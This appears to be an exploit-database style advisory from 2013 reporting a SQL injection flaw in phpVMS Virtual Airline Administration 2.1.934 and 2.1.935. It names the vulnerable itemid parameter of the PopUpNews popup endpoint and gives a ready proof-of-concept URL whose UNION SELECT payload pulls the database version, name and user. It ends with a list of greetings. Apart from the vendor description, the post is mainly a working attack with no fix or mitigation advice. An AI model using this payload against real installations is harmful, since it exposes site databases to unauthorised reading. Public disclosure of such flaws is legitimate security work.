phpVms Virtual Airline Administration 2.1.934 & 2.1.935 - SQL Injection Vulnerability



=============================================================================================================



  [o] phpVMS Virtual Airline Administration <= SQL Injection Vulnerability

       Software : phpVMS Virtual Airline Administration
       Version  : 2.1.934 & 2.1.935
       Vendor   : http://www.phpvms.net
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Desc     : phpVMS is the most popular, free, virtual airline software,
          with support for various ACARS applications (kACARS, FSACARS, XAcars, FS Flight Keeper, and FSPassengers),
          AJAX-driven administration panel, complete with financial reports, schedule management and
          various other features designed for realistic operation of your virtual airline.


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/index.php/PopUpNews/popupnewsitem/?itemid=[SQLi]


=============================================================================================================


  [o] PoC

       http://localhost/path/index.php/PopUpNews/popupnewsitem/?itemid=123+union+select+1,version(),database(),4,user()--


=============================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{


=============================================================================================================


  [o] April 15 2013 - Papua, Indonesia